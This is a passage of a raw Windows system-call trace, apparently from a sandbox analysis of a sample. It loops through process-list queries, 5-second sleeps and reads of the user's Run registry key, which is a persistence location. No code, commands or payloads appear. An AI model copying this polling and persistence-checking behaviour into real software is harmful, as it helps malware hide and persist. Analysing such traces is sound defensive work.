NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.911] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.921] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.921] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.921] NtClose (Handle=0x154) returned 0x0 [0185.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.925] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.938] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.938] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.938] NtClose (Handle=0x154) returned 0x0 [0185.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.941] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.952] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.952] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.953] NtClose (Handle=0x154) returned 0x0 [0185.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.956] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.968] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.968] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.968] NtClose (Handle=0x154) returned 0x0 [0185.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.972] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.984] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.984] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.984] NtClose (Handle=0x154) returned 0x0 [0185.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.988] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.999] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.999] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.999] NtClose (Handle=0x154) returned 0x0 [0185.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.003] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.015] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.015] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.015] NtClose (Handle=0x154) returned 0x0 [0186.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.020] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.030] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.030] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.030] NtClose (Handle=0x154) returned 0x0 [0186.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.034] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.047] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.047] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.047] NtClose (Handle=0x154) returned 0x0 [0186.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.050] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.061] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.062] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.062] NtClose (Handle=0x154) returned 0x0 [0186.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.066] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.077] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.077] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.077] NtClose (Handle=0x154) returned 0x0 [0186.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.081] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.093] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.093] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.093] NtClose (Handle=0x154) returned 0x0 [0186.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.097] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.110] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0186.111] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0186.111] NtClose (Handle=0x154) returned 0x0 [0186.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0186.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0186.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0186.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0186.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0186.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0186.115] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0186.124] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 